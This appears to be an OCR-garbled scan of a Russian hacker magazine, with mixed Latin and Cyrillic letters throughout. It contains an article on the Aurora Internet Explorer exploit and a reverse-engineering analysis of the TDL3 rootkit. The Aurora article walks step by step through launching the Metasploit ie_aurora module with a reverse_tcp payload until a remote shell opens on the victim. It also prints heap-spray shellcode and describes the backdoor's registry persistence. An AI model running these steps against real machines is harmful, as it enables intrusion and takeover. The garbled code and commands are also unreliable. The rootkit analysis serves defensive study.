вано достаточно данных — помнишь? На самом деле (и здесь внима- 
ние!) код пытается перезаписать память объекта <ітд>, которая еще 
недавно была валидной. Ведь, как только объект <ітд> выгрузили из 
памяти, место, которое он занимал, снова стало свободным. Когда код 



ГЛОССАРИЙ 



КУЧА (НЕАР) — условное название области динамической памяти 
приложения. 

ІМОР — сокращение от английского «І\Іо ОРегабоп», инструкция 
процессора, которая предписывает ничего не делать. 

Обфускация — намеренное запутывание исходного текста путем 
приведения его к виду, сохраняющему функциональность, но 
затрудняющему анализ. Обратная операция называется деобфу- 
скацией. 

АйОВЕББ БРАСЕ І.АѴ01Л РАЫ00МІ2АТІ0Ы (А5І.В) - рандоми- 
зация адресного пространства. Технология случайно выделяет 
пространство для стека, кучи и других элементов в адресном 
пространстве процесса, чем серьезно усложняет жизнь авторам 
сплоитов. 



ѵаг 1: = еі .згсЕІетепІ; 

Свойство згсЕІетепІ возвращает объект, который инициировал 
событие еі . А этим объектом является <ітд>, который был удален из 
объекта зрап с помощью свойства іппегНТМЕ. Вот здесь ІЕ и сходит 
сума из-за ошибки при попытке получить объект, который был ранее 
удален. Браузер ссылается по старому указателю, который хакер сумел 
«перекрыть» множеством значений ОхОССЮОССЮ, и управление пря- 
миком попадает в кучу, на один из блоков, инжектированных с помо- 
щью Неар Бргауіпд'а. Все: на машине клиента спокойно выполняется 
шелл-код, осуществляющий загрузку бэкдора. 

БЭКДОР ДЛЯ 6006І.Е? 

Пробив ІпІегпеС Ехріогег, сплоит загружает и устанавливает в системе 
бэкдор. Несмотря на серьезные цели (все-таки сотрудники Ооодіе 
и т.п.), никакой серьезной защиты у самого трояна нет. Для обфу- 
скации используется пресловутый прием «Спагетти-код», с которым 
справляются автоматические средства, в том числе Нех-Науз. А для 
обоснования в системе используются вполне традиционные техни- 
ки с использованием процесса БѵсНозСехе винды. Любой сервис 
прописывается с помощью ключа в ветке НКЕѴ_ЕОСАЕ_МАСНІІ\ІЕ\ 
БузІепгЛСиггепЮопІгоІБеЛБегѵісезѴ а группы сервисов обозначают- 
ся в ветке НКЕУ_Е0САЕ_МАСНІЫЕ\5оПѵѵаге\Місго5отѴѴІпбо\л/5МТ\ 
Сиггеп1;Ѵег5Іоп\5ѵсГіо5Е Бэкдор создает временный сервис со слу- 
чайным именем и создает новую группу сервисов Бузіпз. Далее 
библиотека %5узІет%\газтоп.сіи с телом троя прописывается как 
зегѵісеБЦ. для этого сервиса, и загрузчик выполняет команду: 

С:\ѴѴіпбоѵѵ5\5у5І:ет32\5ѵсЬо5Еехе -к Бузіпз 

Библиотека газтоп.біі загружается в память. Напомню, что когда 
система запускается, он проверяет ветки в реестре и запускает те 
сервисы, для которых установлен автозапуск. Бэкдор создает для 
себя запись с описанием сервиса — а система делает все за него. 
Загруженная библиотека продолжает осваиваться в системе. Сначала 
она удаляет временный сервис и создает в реестре запись для ново- 
го сервиса с именем На5[4 случайных символа] (например, НаБхаке), 
после чего опять же прописывает библиотеку зегѵісеБЕЕ и при- 
вязывает сервис к стандартной группе пеСзѵсз. После этого бэкдор 
автоматически запускается на старте системы с помощью зѵсЬозі. 
Аналогичный прием использовал ѴѴ32Юо\л/пабир, о котором мы под- 
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дайЯ®м» 



взлом 



довипэ сѵітга'Л, 
дойиНЪШл і| 





ЕВ 


р] 


иргіаіііпд ІіНе Меіга^ріоіі; Ргатешгк... 




А 


іезі А е5*5/04А&5к_тападег Аез* - г Ь 




11 


рі иді п^/пехрозе* г Ь 




1! 


рі иді П5/сіЬ_сгесІсо1 1 есС. гЬ 




Ш 


рі иді п 5 /еіЬ_ 1 :гаскег. гЬ 




и 


рі иді пгАокегЦпипТег. гЬ 




и 


рі иді пэ/еѵепІіАез’Ьег. гЬ 




А 


рі иді пэ/зоипгіБ. гЬ 




и 


ех^егп аі /зоигсе/те'Ьзѵс/^ез'Ь, гЬ 




и 


ехТегпаІ /зоигсеАкеІ 1 соіе/т псІс^5/х64/Ьиі 1 с(. ру 




А 


ехііегпаі /эоигсе/зНеІ 1 еосІе/Ѵі псіош5/х64/5гс/ітіі дга±е 




А 


ехТегпаІ Аоигсе/еНеІ 1 сосіе/мі п4о^5/х64/5гс/ті дга*е/аро. аэт 




А 


ехііегпаі /эоигсе/эИеІ 1 согіе/лгі п с1о^5/хб4/5гс/ті дга1:е/гето1:е1:Нгеаск азт 




А 


ехТегпаІ /зоілгсе/зИеІ 1 сосІе/Ѵі псіош5/х64/5гс/піі дга^е/ті дга^е, азт 




Ш 


ехііегпаі /зшгсе/зНеІ 1 сосІе/ші пс!о^5/хб4/згс/Ыоск/Ыоск_арі . азт 




Ш 


ехТегпаІ Аоигсе/гНеІ 1 сосіе/мі псІо^г/хЗб/Ьиі 1 с), ру 




и 


ехТегп аі /шигее/зНе! 1 сосіе/мі пс1оіл?5/х86/5гс/ 5І пді е/аі 1ос_ехеси1:е, аэт 




А 


ехТегпаІ Аокгсе/зНеІ 1 согіе/мі псіои5/х86/5гс/гтіі дга^е 




А 


ехііегпаі /^оиг се/эНеІ 1 еоеЗе/юі пі±зш5/х86/5гс/піі дгаііе/арс. а^гті 




А 


ехііегпаі Аоигсе/зНеІ 1 согіе/ші псіо^5/х8б/5ге/піі дга1:е/ехесиТехб4, а5т 




А 


ехііегпаі /5оигсе/2Ие1 1 сосіе/ѵѵі п гіо'л^/х86/5гс/ті дгаііе/ті дгаііе. азт 




и 


ех1:егпа1/50игее/ѵпссЛ 1/г1 і Ь/СНапдеІод 




А 


ехТ е г п аі /во иге е/тв^З аѵаТоо 1 к і 1: 




А 


ехі: егпа1/50 иг ее/т5-Р:) аѵаТоо 1 кААе^Сотрі 1 а*іоп. гЬ 




А 


ехііегпаі /зоигсе/тз^ЗаѵаТооІ кі'Ь/сотрі 1 е. вЬ 




А 


ехііегпаі /5 о иг се/гі5І\]аѵаТоо1 кААеэ-Ьэи^сИ г 




А 


ехііегпаі /^оигее/т^-рз аѵаТоо 1 кААе^КеуТооІ . гЬ 




А 


ех^егпаі /50 игее/гп5І\] аѵаТоо 1 кА/з^ѵаСотрі 1 е 




А 


ехііегпаі /50 иге е/гпг^З аѵаТоо 1 кА/заѵаСоетірі 1 е/Сгеа1іе^гГі 1 е.даѵа 




А 


ехііегпаі /50 иг с е/гп^ІД аѵаТоо 1 кіТ/даѵаСотрі 1 е/Сотрі 1 е5оигсе!пМетогу оаѵа 




А 


ехТегпа! /во и г с е /тв^З аѵаТоо 1 кіТ/заѵаСопірі 1 е/5і дп^аг, заѵа 




А 


ех± егп аі /50 игсе/гл5-РЗ аѵаТоо 1 кі ’Ь/тз’Ркеу эТоге 




А 


ехТегпаІ /гоигсе/тг-РЗаѵаТоо! кіТ/ои-Ьри-С. даг 




А 


ехііегпаі Аоигсе/^-РЗаѵаТооІ кіІі/зоиіри’Ьоаг 




А 


ехТегпаІ /зоигсе/кіТгарОсі 




А 


ехііегпаі /5оигсе/кі1ігар0сі/ѵ4та1 ІомесІ. с 




А 


ехТегпа! /зоигое/кі^гарОсі/АОѴІ^ОкУ 





ДЛЯ ИСПОЛЬЗОВАНИЯ СПЛОИТА НЕОБХОДИМО ОБНОВИТЬ БАЗЫ МЕТАБРЮІТ'А 



робно рассказывали в прошлом году. Кстати 
говоря, удалив эту «точку загрузки» и пере- 
загрузившие^ можно быстро избавиться от 
заразы. 

Сам троян, прописавшись в системе, полу- 
чает команды через несколько серверов- 
админок, которые на текущий момент уже 
прикрыты. Причем в протоколе общения 
бэкдора с сервером-админкой используется 
хитрый способ для вычисления контрольных 
сумм, описанный в одном из китайских изда- 
ний, — одна из причин, почему считается, 
что атака была инициирована хакерами из 
Китая. 

СПЛОИТ В ДЕЙСТВИИ 

Тело сплоита вскоре после атаки стало 
доступным на портале ѴѴераѵѵеТ (ууедаѵѵеС 
ізесІаЬ.огд ]. Не заставил себя ждать и 
соответствующий модуль для МеТазрІоіІ, 
благодаря которому протестить свои 
локальные машины на наличие уязви- 
мости, проверив работу сплоита, стало 
проще простого. Для начала необходимо 
скачать последнюю версию МеТазрІоіІ: 
[ ѵѵѵѵѵѵ.теІазрІоіІ.соппЛгатеѵѵогк/боѵѵпІоаб І 
и с помощью онлайн-апдейта обновить 
базы сплоитов. Напомню, что управление 
фреймворком осуществляется с помощью 
специальной консоли тзкопзоіе, через 
которую вводятся текстовые команды. 
Чтобы использовать модуль іе_аигога, в 
котором хранится сплоит для ІЕ, необхо- 
димо: 



1. Сначала подключить нужный модуль: 

тзі > изе ехріоід/міпсісжз/ 
Ьгсжзег/іе_аигога 

2 . Далее выбрать шелл-код, т.е. боевую 
нагрузку, которую будет выполнять сплоит 
на машине жертвы в случае успешного 
эксплуатирования уязвимости. Выбираем 
Ьасксоппесі: (жертва сама «постучится» к 
нам после поражения]: 

тзі ехріоіе ( іе_аигога) > зеС 
РАУЬОАБ міпсІсжз/теЦегргеЦег/ 
геѵегзе_Ьср 

3. Для ЬасксоппесЕа указать порт, на котором 
будем ждать подключения от пораженной 
машины: 

тзі ехріоіс ( іе_аигога) > зеС 
ЬНОЗТ наш_ІР 

4 . Дополнительно через параметр НВІРАТН 
указать адрес, где будет находиться «отрав- 
ленная» сплоитом НТМІ_-страница (у нас 
она будет в корне): 

тз^ ехр1окЦе_аигога] > зеі ІІРІРАТН / 

5 . И, в конце концов, отдать команду на соз- 
дание странички со СПЛОИТОМ: 

шзб ехріоіс ( іе_аигога) > ехріоіе 



В консоли метасплоита появится сообщение 
об ожидании подключений на локальном 
ІР-адресе: 

[*] ЕхрІоіС гиппіпд аз Ьаскдгоипсі 
3 оЬ . 

[*] ЗСагСесІ геѵегзе Ъапсііег оп 
рогС 4444 
[*] Ьосаі ІР: 

ІЩЦр:/ /192. 168. 0.23: 8080/ 

[*] Зегѵег зСагСесЗ. 

Все, теперь можно на любой машине с 
Іпіегпеі Ехріогег 6 (мы тестили на ѴѴіпбоѵѵз 
ХР 5РЗ] открыть браузер и обратиться 
по адресу и порту, указанному в босаі ІР 
(кі11р://192. 168. 0.23:8080). Если сплоит сра- 
ботает, в консоли метасплоита ты увидишь 
сообщение о новой сессии (ЬасксоппесЕа): 

[*] Зепсііпд зСаде (723456 ЬуСез) 
[*] МеСегргеСег зеззіоп 1 
орепесі (192.168.0.23:4444 -> 
192.168.0.97:1514) 

Считай: дело в шляпе. Остается только вос- 
пользоваться бэкконнектом, переключившись 
на нужную сессию, и отдать одну из команд 
метасплоита, например, на открытие шелла: 

шзі ехріоіе (іе_аигога) > зеззіопз 
-і 1 

[*] ЗСагСіпд іпЦегасСіоп міСЪ. 

1 . . . 
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НЕАР 



: ОТНЕК ЗТРШІШЕЗ 

I 

I 

ДО НЕАР ЗРКАѴ 



. НІ6Н АйРЕЗЗ ТО 0Х7РРРРРРР 



ЛМР НЕРЕ 
ЗС0ОРР7О 



► 



96АВ0000 

► 




ІпіесіесІ Неар 
Іпіесіесі Неар 
Іпіесіесі Неар 
Іпіесіесі Неар 

ІіфсЫ НеарреализауІНоп'е 



Неар 



отнек зтпцстцкез 



ПОСЛЕ НЕАР ЗРРАУ 



№Р + ЗНЕІ1С00Е 



+ ЮѴѴ АРРЕ55 ТО 0X00000000 



+ ЮѴѴ АОРЕЗЗ ТО 0X00000000 



НЕАР ЗРКАѴШ6 ЗАПОЛНЯЕТ КУНУ ОДИНАКОВЫМИ БЛОКАМИ 
«ПОСЛЕДОВАТЕЛЬНОСТЬ ИОР'ОВ + ШЕЛЛ-КОД» 



ОеоЫизсаііоп гегиііз 
Еѵаіз 

• ѵаг п « ипезсаре ("*иОсО<і%иОсОсі") ; 
ѵміе (п.ІепдсА < ж 524288)п +■ п; 

п = п.зиѣзсгіпд( Э, 524269 - зс.ІепдсЬ); 
ѵаг х - пеѵ АггауО; 

*ог (ѵаг і. - 0; і < 200; і ++ ) { 
х{1) - п + зс; 

> 

(гереаіеб 1 Ите) 

ѴѴгііез 

• <ЬЪт1ХзсгірЪ>ѵаг зс ■ иг.езсаре(” 

%и9090%и19еЪ%и4Ъ5Ъ%и3390%и90с9%и7Ъ80%ие901%и0175%иб6сЗ%и7ЪЬ9%и8004%иОЪ34%ие2й8%иеМа%ие805 
%и«е2%иС«і%и3931%иеі8сіЪ%и87сі8%и79Ъс%исі8е8%ис18сі8%и9853%и53сі4%ис4а8%и5375%исІ0Ъ0%и2г53%исі7Ъ2 
%и3081%ийЪ59%ий8<іЗ%иЗа48%иЪ020%иеаеЪ%исі8<і8%и8с1Ь0%иЪ<іаЪ%и8саа%и9е53%и30е14%исІа37%и<і8с18%и3053 
%исі9Ъ2%и3081%исіЪЪ9%исіесі8%и213а%иЪ7Ь0%исі2Ъ6%иЪ0сі2%иааасі%иЪ5Ъ4%и538с%ис14 9е%и0230%исіЗсіа%и53с18 
%иЪ230%и81с!9%и9а30%ий8сіЪ%иЗай8%иЪ021%иеЬЪ4%ийЗеа%иаЪЪ0%иЪсІЪ0%и8сЪ4%и9е53%и30й4*ийа69%исі8й8 
%и3053%исі9Ъ2%и3081%исіЪЯэ%иеі8сі8%и213а%и3459%и<і9сі8%исі8еі8%и0453%и1Ь59%исі858%исі8<і8%и<і8Ь2%ис2Ъ2 
%иЬ28Ь%и27сі8%и9с8е%и18еЪ%и5893%и<іЪе4%иасі<іЗ%и5121%и485е%и<і8с18%и1Г<13%иаъсіс%иЪ984%иЪс1і6%и9с1Г 
%исіссіЪ%иЪ<іа0%иеі8сі8%и11еЪ%и8989%и8і8Ъ%иеЪВ9%и5318%и989е%и8630%иеі8сіа%и5Ъсі8%иеі820%и5сісі7%исі9а7 
%ий8й8%ий8Ь2%ийвЪ2%ийЪЪ2%ис18Ъ2%ийаЪ2%ис18Ъ0%ий8с18%и8Ъ18%и9е53%и30Гс%ийае5%ис18йЗ%и205Ъ%ий727 
% и 865с%ис18с19%и51с18%иЬ89е%ис18Ь2%и2788%иг08е%и9е51%и53Ьс%и485е%исіесіЗ%иіг«18%ис1Ьс1с%иЬа84%иЬ<ігб 

ЧАСТИЧНО РАСШИФРОВАННЫЙ КОД СПЛОИТА ВПЕРВЫЕ ПОЯВИЛСЯ 
НА ПОРТАЛЕ ѴѴЕРАѴѴЕТ 



теСегргеСег > зТіеІІ 
Ргосезз 892 сгеаБесІ. 

СЬаппеІ 1 сгеаДесІ. 

МісгозоТБ ТлГіпсІсжз ХР [Ѵегзіоп 
5.1.2600] 

(С) СоругідЬЩ 1985-2001 МісгозоТБ 
Согр . 

С : ХБосшпепБз апсі 8еББіпдз\ТезБІаЪ\ 
БезкБор> 

Готово! Помимо модуля для метасплоита, 
существует также публичная реализация на 
РуіЬоп'е [ ргаеІогіапргеІесГсот/ѵѵр-сопІепі/ 
ирІоабз/201 0/01/іе аигога.рѵ .1x1 ] . которая 
на указанном порту поднимает веб-сервер 
и отдает подключившимся клиентам НТМІ_- 
ку с эксплоитом: руіЬоп іе_аигога.ру [номер 
порта]. В качестве нагрузки используется 
шелл-код, запускающий на атакуемой маши- 
не Калькулятор (саіс.ехе). 

ПОЧЕМУ ІЕ6? 

На самом деле критическая ошибка суще- 
ствует во всех версиях I пТегпеТ Ехріогег. 
Однако риск заражения для пользователей 
ІЕ8 значительно ниже. Это обусловлено тем, 
что для Іпіегпеі Ехріогег 8 (и на всех плат- 
формах, где его можно установить] активиро- 
вана ОЕР (Эаііа Ехесибоп Ргеѵепбоп] — 
технология предотвращения выполнения 
данных. Смысл в том, что она препятствует 
исполнению кода из тех участков памяти, 
которые помечены как «неисполняемые». 



Именно поэтому с включенной технологией 
ОЕР эксплоит не сможет выполнить данные 
в куче, и в худшем случае пользователя 
ожидает аварийное завершение работы 
браузера. Впрочем, зесигКу-компания Ѵиреп 
[ ѵѵѵѵѵѵ.ѵиреп.сот/ехрІоіЫ объявила, что 
сумела обойти ОЕР и эксплуатировать ІЕ8, 
но публично доступных сплоитов пока нет. 
Місгозоіі, в свою очередь изучив предостав- 
ленные ей ргоо^-о^-сопсері сплоиты, анон- 
сировала, что пользователи ѴѴіпбоѵѵз Ѵізіа и 
более поздних систем намного более защи- 



щены от атак благодаря технологии Аббгезз 
Эрасе ЕауоіЛ Рапсіогтшабоп (А5ЕР). 

Еще один вопрос: откуда взялось это назва- 
ние «Аврора»? Слово «Аигога» было частью 
файлового пути на компьютере хакера и 
было включено в два бинарных вредоносных 
файла, которые загружались в ходе атаки. 
Такой файловый путь обычно включается 
компиляторами как указатель на место 
хранения исходного кода и отладочных сим- 
волов на компьютере разработчика. Другое 
название сплоита — Нубгац. т 
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АРТЕМ БАРАНОВ АВТЕМВАРАМОѴгаѴАМОЕХ.Ри 



ВЗЛОМ И АНАЛИЗ 

Т01.3 ПОКОРЯЕМ ЛЕГЕНДАРНЫЙ РУТКИТ 



КАК ТЫ. Я НАДЕЮСЬ. УЖЕ НАСЛЫШАН. ПОД ТОІ.З ПОНИМАЮТ НОВОЕ 
ПОКОЛЕНИЕ РУТКИТОВ Т088. ЕГО ОТЛИЧАЮТ НАВОРОЧЕННЫЕ 
ТЕХНОЛОГИЧЕСКИЕ ФИЧИ. КОТОРЫЕ ОСТАВИЛИ БЕЗОРУЖНЫМИ ВСЕ 
АНТИВИРУСЫ И ПОЧТИ ВСЕ АНТИРУТКИТЫ. Я ПОКАЖУ. КАК СЛЕДУЕТ 
РАЗБИРАТЬ ТОІД В ЧЕМ ЕГО ТЕХНИЧЕСКИЕ ОСОБЕННОСТИ И ПОЧЕМУ 
АНТИВИРУСЫ СПАСОВАЛИ ПЕРЕД НИМ. 



П ервая информация о рутките появи- 
лась на гооЖіЕсот в блоге сІіаЫопоѵа 
[ гооЖіЕсоіті/Ь[од.рЬр?пеѵѵ5ІсІ=970 ) и 
содержала сведения о предыдущих 
версиях ТОІ_, а также, собственно, 
о новой версии. Распространение руткита 
началось где-то с октября, тогда же и вышла 
упомянутая статья. 

Бросалось в глаза, что руткит действует как 
файловый вирус, заражая драйвер-порта 
жесткого диска; обычно это аіарі.зуз, нахо- 
дящийся под драйвером класса сіізк.зуз. При 
заражении размер драйвера не менялся, 
руткит перезаписывал часть ресурсов драй- 
вера и устанавливал точку входа на себя. Это 
загрузчик, основная же часть руткита разме- 
щается в конце диска. 

Заражая аіарі.зуз, руткит предоставлял себе 
возможность стартовать на самом раннем 
этапе загрузки ОС. Кроме того, большинство 
антируткитов даже не определят присутствие 
руткита в памяти. Перехват диспатч таблицы 
ІНР в объекте-драйвера аіарі осуществлен 
так: при чтении зараженного драйвера-порта 
руткит подсовывает оригинальный файл. 



Поэтому все АѴ шли лесом, а так как руткит 
работал на самом низком уровне, то даже в 
перспективе определить заражение файла 
смогут далеко не все антируткиты. Не гово- 
ря уже про лечение. Спустя какое-то время 
аналитики ОгѴѴеЬ выпустили статью «От 
ВасксІоог.ТсІзз.ббб и выше (ака ТОІ_3]» [ сІгѵѵеЬ. 
сот/зІабс/ВаскРоог.ТсІзз.ббб (ака%20ТР1_3 ). 
рсШ, которая раскрывает технические особен- 
ности ТРІ_3 и его последующих модификаций. 
Они же первые выпустили лечение этого рут- 
кита. Немного позднее вышла статья хакера 
іНид41іГЗ на гооІкіЕсот [ гооІкіЕсот/пеѵѵзгеасІ. 
рЬр?пеѵузісІ=979 ). также рассказывающая о 
внутреннем мире этого руткита. 

В отличие от ВизІюск.С, который все это 
время держал лидерство среди самых высо- 
котехнологичных руткитов, ТОІ_3 вполне 
нормально работает на виртуальной машине 
и под отладчиком, а код не обфусцирован и 
его вполне можно разобрать по винтикам под 
отладчиком. Однако технологическая начин- 
ка ТОІ_3 может сбить с толку начинающих 
хакеров, ибо она весьма не проста, но очень 
оригинальна. 



Получение семпла руткита тоже зада- 
ча не из легких; я встречал ссылки на 
оЕепзіѵесотриЦпд.пеІ и таІѵѵагеЬѵІез.ога . 
так что, если там поискать, ссылочку вполне 
можно получить. 

НАЧИНАЕМ КОПАТЬ 

Информации в вышеупомянутых статьях 
вполне достаточно для получения представ- 
ления о том, с каким зверем мы имеем дело. 
А я расскажу по шагам, как исследовать 
руткит, плюс дам информацию, которая отсут- 
ствует в этих статьях. 

Нам понадобится виртуалка, желательно 
ѴѴіпсІоѵѵз ХР ЗРЗ, настроенная для отлад- 
ки, и ѴѴіпбЬд, само собой, ЮА для разбора. 
Загружаемся в обычной поп-беЬид конфигу- 
рации, запускаем семпл. Ждем, пока дроппер 
исчезнет, затем перезагружаемся в беЬид- 
конфигурации и подключаем дебаггер. Если 
заражение прошло успешно, руткит выдаст 
в беЬид ой! строчку типа «ТЫз із уоиг Іібе, 
апб іЕз епбіпд опе тіпиіе аі а Рте». Полный 
набор предложений — смотри в статье ана- 
литиков ОгѴѴеЬ. 



► 054 
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ВЕРНЫЙ ПРИЗНАК, ЧТО СИСТЕМА 
ЗАРАЖЕНА 



Вообще-то, при запуске руткитов на вирту- 
алке не мешает установить параметр ОізаЫе 
ассеіегабоп іюг Ьіпагу ігапзіабоп в установ- 
ках процессора виртуальной машины. Как 
оказалось, ісізз.ббб и без него нормально 
запускается. 

Итак, первое, что смотрим, — перехваты в 
ди с патч -та блице драйвера-порта (на моей 
виртуалке это аіарі.зуз]. Если сомневаешь- 
ся в том, какой драйвер у тебя установ- 
лен, выполни команду Иеѵзіаск \беѵісе\ 

ЬагсІсІ Ізк0\с1 гО. Самый нижний драйвер и 
есть драйвер-порта. 

Получим его диспатч-функции (загрузив 
первоначально символы для драйвера, 

.геіоасі аіарі.зуз]. 

Идем по этому адресу и видим: 

кб> и 1975663а 13 

аіарі ! Рог1РаззТЬгоидк2егоБпизесІВи11ег 
з+0х34 : 

1975663а 

шоѵ еах,сБтогс1 рбг сіз : [РРБРОЗ 086] 
1975663 1 

;Ітр бѵгогсі рбг [еах+0РС6] 

19756645 

асісі бубе рбг [еах],а1 

Неплохой способ, обманывающий анти- 
руткиты: ТОІ_3 нашел зануленное место в 
конце секции и вписал туда переход на 
свой код (очевидно, это общая для всех 
ІВР функция-обработчик руткита). Здесь 
мы впервые сталкиваемся с его главной 
структурой, которая адресуется от адреса 
0хРРОР0308. Да-да, ты не ошибся, она 
находится в Ки5ЕР_5НАРЕ0_0АТА, вернее, 
в ее неиспользуемой (читай, малоиспользу- 
емой] области. Проведя ночь в отладчике, я 
расковырял ее важные части. Далее я буду 
часто ссылаться на эту структуру. 

збгисб _Т А I Б_Р АКАМ_В БО С К 

{ 

РѴОІБ рТаіІІпМеш; //+0, указатель 
на хвост в памяти 
РѴОІБ КегпеІВазеАсІсІгезз ; // + 4, 

стартовый адрес ядра 
РѴОІБ МоипбесІѴЕЗБеѵісеОЪз есб ; // 

+8, объект устройство абарі, к 
которому руткит примонтировал свою 
ѴЕЗ 

Р ѴО I Б Бпкпомп 1 ; / / + С 






Ѵггіиаі МасМпе 5е!1іпр 




ЛУЧШЕУСТАНАВЛИВАТЬ ЭТОТ ПАРАМЕТР, ЕСЛИ СОБИРАЕШЬСЯ ЗА- 
ПУСКАТЬ РУТКИТ НА ВИРТУАЛКЕ 



ЦЬСЖЗ ТаіІОізкОіЕзЬом; 

// + 10, ББОШБОШ, смещение хвоста 
на диске 

ББОШ ТаіІБізкОІІзНідБ; // + 14 
ББОШ питОІѴаІісІЗесбогІпНісІеАгеа; 
//+18, число секторов в скрывае- 
мой области 

РА8Т_МБТЕХ ЕазбМибех; //+1С 
ББОШ ТаіІЗбагбБізкЗесбог ; //+ЗС, 
стартовый БВА хвоста 
ББОШ НібеАгеаЗбагбЗесбог ; / / + 4 0 , 
стартовый БВА скрываемой области 
БСНАК згВоБІб [36] ; //+44, событие 

с таким именем создается в корне 



ББОШ 


Бпкпоѵт2 ; 


// + 68 


ББОШ 


БпкпоѵтЗ ; 


// + 6С 


ББОШ 


Бпкпоѵді4 ; 


// + 70 


ББОШ 


Бпкпоѵт5 ; 


// + 74 


ББОШ 


Бпкпоѵтб ; 


// + 78 


ББОШ 


Бпкпоѵт7 ; 


/ /+7С 


ББОШ 


Бпкпоѵт8 ; 


// + 80 


ББОШ 


Бпкпоѵт9 ; 


// + 84 


ББОШ 


Бпкпоѵті 0 ; / / + 8 8 


О 

Й 

О 

д 

р 


ОгідАБаріЕипсз [ОхІС] ; 


//+8С , 


, оригинальные диспатч- 



функции драйвера-порта 

РѴОІБ КообкібБізрабсБЕипс ; 

//+РС, главная диспатч -функция 
руткита 

РѴОІБ АбаріБгіѵегОб} есб ; //+100 

РѴОІБ АБаріВооБКооБкіББеѵОЬП ; 

// +104, объект-устройство 
драйвера-порта для диска, на кото- 
ром хранится этот драйвер 

ББОШ ЗесбогЗіге; // + 108 

РѴОІБ рКегпе132_БоабБіЪгагуЕхА; 



//+10с, для инжекции в процессы 
ББОШ сЕпБгуІпНібеАгеаТаЫе; 
//+110, далее таблица скрываемых 
секторов 

зБгисБ 

{ 

ББОШ ЗесБогЗБагБ ; 

ББОШ ОІІзРготЗесбог ; 

ББОШ КезбогеБабаЗіге; 

РѴОІБ рОгідБаба; 

ББОШ ипкпоѵт ; 

} 

НібеАгеаЕпбгу [7 ] ; //+114 

ББОШ ипкпоѵліі Д 451 .? /74 1А0 
ШНАК БігЗідпаБиге [9] ; //+254, 
сигнатура виртуального каталога 
ШНАК БігЕиІІРабб [30] ;// + 266, 
полный путь к виртуальному ката- 
логу 



} 

ВНУТРИ ХВОСТА 

Как ты понял, руткит состоит из двух частей: 
загрузчика, который находится в секции 
ресурсов, и хвоста, который включает в себя 
весь руткит-функционал. Задача загрузчика 
руткита — загрузить хвост в память и пере- 
дать на него управление. Наша же задача — 
сдампить хвост в файл для последующего 
анализа в ЮА. И здесь можно пойти двумя 
способами. Во-первых, можно сдампить рут- 
кит из памяти. Мы знаем структуру хвоста и 
что в его начале идет сигнатура ЮРЗ, потом 
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взлом 



Ьіі> 'ОеизТаск \йеѵісе\НэгіІ<ІІ5кО\йг0 
*0еѵ0Ь} *0 гу 0Ь} 'ОеиЕхІ: 

8192Ь51В \ОгІиег\Раі-1:Мдг 8192Ь5йв 

> 8192Ь740 \Ргіивг\РІ5к 8192Й7Е8 

8і9$68е8 ШШ2Ш1 Э19569аѲ 




ОГдес^Иате 

ВИВ 

I сІеОемісеР ОТ 01, 0- 4 



•ВеоНогіе 81954*68 ; 

Оеиісеіпз* із ++ ІРЕШ5киКмаге_діг^иа1_І0Е_ і Наг^0гіие вевООООПЭвЗвЭвЗвЗВЗвЗ 

Бегміее Изгое із **йі$к** 



ВЫВОД КОМАНДЫ 0ЕѴ5ТАСК, ВЫДЕЛ ЕННЫЙ ДРАЙВЕР -\ОРІѴЕК\ 
АТАРІ НАХОДИТСЯ НИЖЕ 0І5К.5Ѵ5. ОН ЖЕ И ЕСТЬ ДРАЙВЕР ПОРТА 
ЖЕСТКОГО ДИСКА 




ДИСПАТЧ-ФУНКЦИИ УХОДЯТ НЕ- 
ИЗВЕСТНО КУДА, НЕСМОТРЯ НА 
ТО, ЧТО УКАЗЫВАЮТ ВТЕЛО АТАРІ 



оригинальные ресурсы, а потом код. Берем 
значение РооІкіЮізраІсЬРипс из основной 
структуры (у меня это 8 1 8е2е3 1 ] и выполня- 
ем команду поиска вниз по памяти сигна- 
туры «ТБІ_3». 

Теперь осталось сдампить 0x5 Е00 байт 
(столько байт загрузчик выделяет для 
хвоста), начиная со стартового адреса, 
командой .ѵѵгТетет Б :\1 . Ь і п 8186Ю00 
ІбеОО. Второй способ: восстанавливаем 
оригинальные диспатч-функции аіарі.зуз, 
копируя их из поля ОгідАіаріРипсз струк- 
туры руткита и далее дампим секторы с 
диска с помощью, например, Б ізкЕхрІогег. 
Вынести хуки руткита можно одной коман- 
дой — т, копирующей память из одного 
буфера в другой; 

т роі(РРВР0308]+8С 170 81957548+38, где 
81957548 — в моем случае адрес объекта- 
драйвера аіарі. 

После этого мы получаем доступ к зара- 
женному аіарі.зуз на диске и скрываемой 
руткитом области на диске. Сектор, с кото- 

В ПОСЛЕДУЮЩИХ ВЕРСИЯХЮІ-З 
АВТОРЫ ИСПОЛЬЗУЮТ ПОДМЕНУ 
ОБЪЕКТА ДРАЙВЕРА В ОБЪЕКТЕ- 
УСТРОЙСТВА, ПРЕДСТАВЛЯЮЩЕ- 
ГО ДИСКНАУРОВНЕ ДРАЙВЕРА 
КАНАЛА. ПРИ ЭТОМ ОРИГИНАЛЬ- 
НЫЙ ОБЪЕКТ ДРАЙВЕРА ОСТАЕТ- 
СЯ ЧИСТЫМ. ВЕРНЫЙ ПРИЗНАК 
ЗАРАЖЕНИЯ СИСТЕМЫ ТВІ.З 




РУТКИТЗАИНЖЕКТИЛ йЫ-В 
ЕХРЬОРЕР И ЗАБЫЛ УБРАТЬ ЕЕ ИЗ 
РЕВА 



рого начинается хвост, хранится в поле 
ТаіІЗіагЮізкЗесІог. Точку входа в хвост 
легко определить, зареверсив инфициро- 
ванный аіарі.зуз. Где-то в конце стартовой 
функции загрузчика видим код 
Для разбора хвоста грузим его в иду, при 
этом указав в стартовом окне смещение, 
с которого мы дампили хвост в памяти. В 
дальнейшем будет гораздо удобнее рабо- 
тать с адресами, которые совпадают как в 
идее, так и в памяти. 

Загрузив файл, мы сразу можем перейти 
к разбору основной функции-обработчику 
ІРР в рутките. Делаем бб роі ( ЕЕБ ЕОЗОвІ+бс 
И и затем по полученному адресу идем в 
иду, и превращаем код в функцию — кла- 
виша Р. 

ѴРЗ РУТКИТА 

Ты, должно быть, в недоумении, зачем 
руткиту перехватывать все диспатч- 
функции аіарі, когда для скрытия секторов 
достаточно одной — ІВР_Мб_ІІ\ІТЕПМАІ__ 
ОЕѴІСЕ_СОІ\ІТПОІ_ (ака ІВР_Мб_5С5І]. 
Драйверы дисков не обрабатывают сгеаіе/ 
сіозе запросы, потому что не работают с 
дескрипторами, как Е5Б, которым нужно 
инициализировать файловые объекты для 
открываемых файлов. Такие драйверы 
